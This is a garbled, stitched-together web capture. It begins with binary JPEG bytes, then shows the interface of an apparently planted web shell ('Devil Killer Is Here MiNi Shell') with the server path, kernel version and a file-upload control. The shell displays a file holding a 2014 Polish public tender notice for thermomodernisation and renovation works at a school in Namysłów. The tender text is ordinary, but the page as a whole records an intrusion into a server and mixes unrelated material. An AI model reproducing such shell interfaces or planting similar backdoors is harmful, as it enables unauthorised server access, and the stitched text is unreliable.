JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/33945-N-2014.html

<p class="kh_header"><b>Namysłów: Wykonanie zadania pn. ochrona powietrza poprzez termomodernizację i wykorzystanie OZE w budynkach publicznych na terenie Gminy Namysłów</b><br>
<b>Numer ogłoszenia: 33945 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa , ul. Stanisława Dubois 3, 46-100 Namysłów, woj. opolskie, tel. 077 4190359, faks 077 4104841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.namyslow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie zadania pn. ochrona powietrza poprzez termomodernizację i wykorzystanie OZE w budynkach publicznych na terenie Gminy Namysłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa i kod wg Wspólnego Słownika Zamówień: Roboty budowlane w zakresie budowy obiektów budowlanych związanych za szkolnictwem - 45214200-2.
Przedmiot zamówienia przewiduje wykonanie robót termomodernizacyjnych oraz robót remontowo-budowlanych i instalacyjnych i obejmuje: termomodernizację budynku B Gimnazjum Nr 1 przy ul. 3 Maja w Namysłowie.
Zakres  termomodernizacji wraz z robotami towarzyszącymi obejmuje:
1) Roboty termomodernizacyjne: a) docieplenie ścian zewnętrznych nadziemia budynku tzw. metodą lekką z zastosowaniem styropianu grubość 14 cm wraz z ościeżami grubość 2 cm, kolorystyka elewacji - kolory niestandardowe wielobarwne w kolorach intensywnych do zaakceptowania przez           Zamawiającego; wyprawa elewacyjna typu kornik z gotowej masy akrylowej,
b) wykonanie robót towarzyszących - demontaż i montaż rusztowań, demontaż i montaż obróbek blacharskich, rynien dachowych i rur spustowych z blachy ocynkowanej, montaż skrzynek złączy kontrolnych instalacji odgromowej, demontaż i montaż parapetów zewnętrznych prefabrykowanych z blachy powlekanej, malowanie farbą olejną krat okiennych, rur żeliwnych i szafki gazomierzowej, c) docieplenie ścian zewnętrznych przy gruncie z zastosowaniem styropianu grubość 10 cm wraz z robotami towarzyszącymi - rozebranie nawierzchni bitumicznej przy budynku, wykonanie wykopów  - odkrycie ścian fundamentowych na terenie działki inwestora, oczyszczenie murów fundamentowych, wykonanie 2-krotnej izolacji pionowej z emulsji bitumicznej, wykonanie pionowej izolacji termicznej z styropianu wodoodpornego, wykonanie izolacji pionowej z folii kubełkowej, zasypanie wykopów, piaskiem zagęszczanym warstwami co 30 cm do stopnia Is=0,80, rozbiórka istniejących schodów betonowych, wykonanie nowych schodów z kostki betonowej kolorowej grubość 6 cm z podstopnicami z obrzeży betonowych 8x30 cm obetonowanych, montaż obramienia studzienek przyokiennych z elementów granitowych z zamontowanym rusztem z płaskownika  zabezpieczonego antykorozyjnie lakierem asfaltowym, d)  zamontowanie 6 szt. perlatorów  umywalkowych  w pomieszczeniach sanitarnych, e) modernizacja instalacji centralnego ogrzewania w całym budynku z rur miedzianych w otulinach termoizolacyjnych wg opracowanego projektu akceptowanego przez Zamawiającego. Grzejniki stalowe konwektorowe z zaworami termostatycznymi z głowicami, zawory           odpowietrzające automatyczne z zaworami odcinającymi, zawory podpionowe, wykonanie bruzd, przejść przez przegrody budynku oraz zaprawienie bruzd i przejść przez przegrody po wykonaniu instalacji. Wymiana przyłącza c.o. z węzła ciepłowniczego zlokalizowanego w budynku głównym rur stalowych na rury preizolowane wraz z robotami towarzyszącymi. Wykonanie projektu  instalacji c.o. Projekt należy wykonać i przekazać Zamawiającemu w wersji edytowalnej (CAD) i PDF na nośniku elektronicznym oraz w dwóch egzemplarzach w wersji wydrukowanej. Instalację należy zaprojektować z rur miedzianych w otulinach termoizolacyjnych prowadzona w kanałach instalacyjnych i bruzdach oraz na ścianach budynku. Grzejniki stalowe emaliowane konwektorowe z przygrzejnikowymi zaworami termostatycznymi z głowicami termostatycznymi, zawory regulacyjne i odpowietrzające automatyczne. Zaprawienie przekuć i bruzd instalacyjnych. Materiały z demontażu (rury stalowe i grzejniki należy pozostawić do dyspozycji zarządcy obiektu. Wykonawca usunie materiały z demontażu i gruz z budynku - materiały z odzysku załaduje i  przewiezie w miejsce utylizacji na terenie miasta Namysłów, a gruz wywiezie na składowisko odpadów komunalnych.
2) Roboty remontowe: a) poszerzenie nienormatywnych otworów drzwiowych do normatywnych i wymiana drzwi wewnętrznych płycinowych wraz z futrynami z obróbką obsadzenia, wypełnienie skrzydeł drzwiowych na tzw. plaster miodu - kolorystyka do uzgodnienia z Zamawiającym (zarządcą obiektu), w każdych drzwiach zamontowany zamek patentowy, b) roboty murarskie i okładziny ścienne - rozbiórka ścianek działowych w pomieszczeniach sanitarnych i szatni personelu i wykonanie nowych ścianek działowych z pustaków ceramicznych typu Porotherm, wykonanie licowania ścian z płytek ceramicznych w pomieszczeniach sanitarnych do wysokości min. 2,00 m z okładziną płytkami parapetów wewnętrznych - wzór i kolorystyka okładzin do uzgodnienia z Zamawiającym, uzupełnienie tynków wewnętrznych z zaprawy cementowo-wapiennej kategorii III, c) remont podłóg i posadzek - obejmujący rozbiórkę parkietu i wykładziny w pracowni komputerowej, wykonanie warstwy wyrównawczej z zaprawy samopoziomującej i założenie wykładziny posadzkowej trudnozapalnej z wywinięciem cokolików wysokość 10 cm na ściany wraz z wykonaniem konserwacji wykładziny - w pomieszczeniu pracowni komputerowej, d) rozbiórka posadzek z płytek ceramicznych w pomieszczeniach sanitarnych i korytarzach, wykonanie warstwy wyrównawczej i wykonanie posadzek z płytek ceramicznych w pomieszczeniach sanitarnych i szatni personelu i korytarzach, uzupełnienie i wymiana płytek w innych pomieszczeniach uszkodzonych przy wykonywaniu wymiany instalacji wraz 
z wykonaniem cokolików, usunięcie gruzu z budynku i utylizowanie, wykonanie okładzin schodów wewnętrznych wraz z cokolikami z płytek ceramicznych antypoślizgowych (struktura nakrapiana), e) wymiana balustrad schodowych na balustrady ze stali nierdzewnej - wzór wg załączników nr 5 do siwz; na balustradach zamontowane zabezpieczenia przed zjeżdżaniem co 150 cm,
f) wykonanie gładzi gipsowych tynków wewnętrznych przeznaczonych pod malowanie farbami emulsyjnymi, wykonanie robót malarskich w zakresie malowania tynków farbami emulsyjnymi oraz  malowania olejnego (parter, piętro, zejście do piwnicy i podpiwniczenie) z przygotowaniem podłoży (zeskrobanie farb, zmycie tynków, zagruntowanie), g) wyługowanie farby olejnej lamperii i wykonanie lamperii z tynku na bazie żywicy syntetycznej 
do wysokości 1,50m od poziomu posadzek z przygotowaniem podłoża, h) wymiana instalacji elektrycznej w obiekcie wraz z wymianą osprzętu zgodnie z opracowaną przez Wykonawcę robót dokumentacją  (sporządzenie i przekazanie  projektu instalacji elektrycznej (oświetleniowa, zasilenia gniazd, oświetlenia ewakuacyjnego, p.pożarowa, komputerowa - pracownia komputerowa, elektryczne przepływowe podgrzewacze wody o mocy 5 kW) zgodnie z obecnie obowiązującymi przepisami oraz sporządzenie dokumentacji powykonawczej - w tym pomiary instalacji elektrycznej i badanie natężenia oświetlenia w poszczególnych pomieszczeniach), i) wymiana wewnętrznej instalacji wodociągowej z rur ocynkowanych na rury miedziane (w tym instalacja hydrantowa - rury ocynkowane) wraz z wymianą szafek hydrantowych z wyposażeniem, montaż otulin termicznych instalacyjnych oraz wykonanie próby ciśnieniowej, wymiana osprzętu sanitarnego, j) wymiana wewnętrznej instalacji kanalizacji sanitarnej z rur żeliwnych i PCV na rury PCV wraz wymianą osprzętu sanitarnego, j) wymiana instalacji gazowej wraz z wymianą osprzętu (taborety gazowe i kuchnia gazowa - uprzednio zdemontowane) oraz szafki naściennej gazowej, k) wyposażenie obiektu w sprzęt gaśniczy i oznakowanie dróg ewakuacyjnych zgodnie z obowiązującymi przepisami, 3) Zagospodarowanie terenu: a) rozebranie istniejącej nawierzchni bitumicznej wraz z wykonaniem koryta pod projektowane nawierzchnie z wywiezieniem i kosztami utylizacji urobku, b) wykonanie drenowania pod projektowaną nawierzchnię poliuretanową boiska z włączeniem do istniejącej kanalizacji deszczowej, c) wykonanie warstwy odsączającej i podbudowy pod projektowane nawierzchnie z tłucznia kamiennego granitowego, d) montaż krawężników i obrzeży betonowych na ławie betonowej, e) wykonanie nawierzchni poliuretanowej boiska i rozbiegu do skoku w dal oraz wykonanie zeskoku i montaż stojaków z wyposażeniem do piłki siatkowej i koszykówki, f) wykonanie nawierzchni z kostki betonowej grubość 8 i 6 cm na podsypce z kruszyny granitowej wraz z regulacją wysokościową wpustów ulicznych i studni rewizyjnych oraz wykonaniem dodatkowego wpustu ulicznego, g) uporządkowanie terenu, zahumusowanie z obsianiem trawą typu parkowego oraz montaż ławek typu parkowego (konstrukcja stalowa, siedziska drewniane lub z tworzywa sztucznego) - typ uzgodnić z Zamawiającym, g) wymiana ogrodzenia terenu szkolnego od strony ul. Dubois - demontaż istniejących przęseł stalowych w ramie z kątownika i wykonanie nowego ogrodzenia wysokość 1,50 m (z cokołem) z paneli ogrodzeniowych malowanych proszkowo (drut grubości min. 4 mm na słupkach stalowych 80/80 mm zabetonowanych w gruncie; cokoły z prefabrykowanych dyli ogrodzeniowych; słupki stalowe cynkowane ogniowo i malowane proszkowo, h) montaż bramy wjazdowej szerokość 6,0 m, wysokość 1,50 m z stalowych profili zamkniętych cynkowanych ogniowo i malowanych proszkowo z zamknięciem na klucz, 
i) wykonanie ogrodzenia boiska wysokość 4,0 m z siatki powlekanej na słupkach z profili zamkniętych 100/100 mm cynkowanych ogniowo i malowanych proszkowo w tym 2 furtki 100/200 cm, j) wykonanie projektu zagospodarowania działki - wymiany nawierzchni terenu przyszkolnego, boiska i skoczni w dal oraz utwardzenia terenu kostką betonową - wg koncepcji - załącznika nr 6 do siwz. Ponadto zakres robót obejmuje usunięcie gruzu z budynku i wywiezienie na składowisko odpadów komunalnych wraz z kosztami utylizacji, uporządkowanie i przywrócenie do stanu pierwotnego terenu w obrębie prowadzonych robót. Szczegółowy zakres robót określają przedmiary robót, które stanowią integralną część przedmiotu zamówienia.
Dodatkowe wymagania Zamawiającego: Wykonawca jest zobowiązany do:
1) przekazania protokolarnego dla zarządcy obiektu zdemontowanych materiałów instalacji wodociągowej i centralnego ogrzewania, 2) wykonanie badań i sprawdzeń ze sporządzeniem protokołów wykonanych instalacji, 3) przedstawienia aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane materiały budowlane i instalacyjne - przed wbudowaniem,
4) Wykonawca udzieli gwarancji na okres min. 3 lat licząc od daty odbioru końcowego, 5) Przed złożeniem oferty Wykonawca może zapoznać się z obiektami objętymi przedmiotem zamówienia w celu sporządzenia należytej wyceny przedstawionego w przedmiarze zakresu robót podstawowych i pomocniczych dla wykonania kompletności zamówienia. 6) Szczegóły przedmiotu zamówienia przedstawiają załączone przedmiary robót, które stanowią element pomocniczy do sporządzenia ofert. 7) Zamawiający dopuszcza zmianę terminu realizacji zamówienia, w przypadku wystąpienia      
warunków atmosferycznych uniemożliwiających wykonywanie robót pod warunkiem, że fakt ten będzie potwierdzony przez koordynatora Zamawiającego. 8) Program funkcjonalno-użytkowy do prac projektowych: Parametry techniczne budynku: - budynek 2-kondygnacyjny z dachem płaskim krytym papą bitumiczną, - powierzchnia użytkowa - 360,0 m2, - kubatura netto - 1.250,0 m3. Obiekt posiada stolarkę okienną i drzwi zewnętrzne wymienione  na termoizolacyjne (za wyjątkiem okienek piwnicznych przewidzianych do wymiany) oraz ocieplony stropodach styropapą grubość
 15 cm. Zamówienie przewiduje docieplenie ścian do wymaganych współczynników izolacyjności termicznej przegród zewnętrznych. Ilości i przekroje rur oraz moce grzejników należy przyjąć wskaźnikowo. Przyłącze ciepłownicze z rur preizolowanych pomiędzy budynkami w ilości 
ok. 2x22,0 m.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 10.500,00 zł (słownie złotych: dziesięć tysięcy pięćset 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże wykonanie co najmniej jednej roboty związanej z termoizolacją ścian i instalacją c.o.; robotami remontowo-budowlanymi wykończeniowymi i instalacji sanitarnych; robotami w branży drogowej (nawierzchnie brukowe) o wartości min. 600.000,00 zł łącznie (w przypadku wykazania mniejszych zamówień wartość wykazanych zamówień będzie zsumowana max. z trzech zamówień). 
Do wykazanych pozycji muszą być załączone dowody dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Za najważniejsze roboty uznaje się roboty niezbędne do wykazania spełnienia warunku tj. co najmniej jedna robota związana z termoizolacją ścian i instalacją c.o.; robotami remontowo-budowlanymi wykończeniowymi i instalacji sanitarnych; robotami w branży drogowej (nawierzchnie brukowe) o wartości min. 600.000,00 zł łącznie. Do przeliczenia wartości określonej w niniejszym punkcie, a występującej w innej walucie niż złoty (PLN), Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Zamawiający dokona oceny spełnienia powyższych warunków oraz przesłanek braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp, na podstawie złożonych (przez Wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie 6 specyfikacji istotnych warunków zamówienia według formuły spełnia - nie spełnia. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, z podaniem zakresu dostępnych Wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada: osobę z uprawnieniami do projektowania bez ograniczeń w zakresie instalacji sanitarnych, osobę z uprawnieniami do projektowania bez ograniczeń w zakresie instalacji elektrycznych oraz osobę z uprawnieniami  do projektowania bez ograniczeń w zakresie dróg, która będzie uczestniczyć w wykonywaniu zamówienia. Zamawiający dokona oceny spełnienia powyższych warunków oraz przesłanek braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp, na podstawie złożonych (przez Wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie 6 specyfikacji istotnych warunków zamówienia według formuły spełnia - nie spełnia. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, z podaniem zakresu dostępnych Wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalna jest zmiana terminu realizacji zamówienia w przypadku wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót, pod warunkiem, że fakt ten będzie potwierdzony przez Koordynatora ze strony Zamawiającego. Wykonawca z zastrzeżeniem przypadku, w którym
Zamawiający nałożył obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane może: 1) powierzyć realizację części zamówienia podwykonawcom, mimo nie wskazania w ofercie takiej części do powierzenia podwykonawcom, 2) wskazać inny zakres
podwykonawstwa, niż przedstawiony w złożonej ofercie, 3) wskazać innych podwykonawców niż przedstawieni w złożonej ofercie, 4) zrezygnować z podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
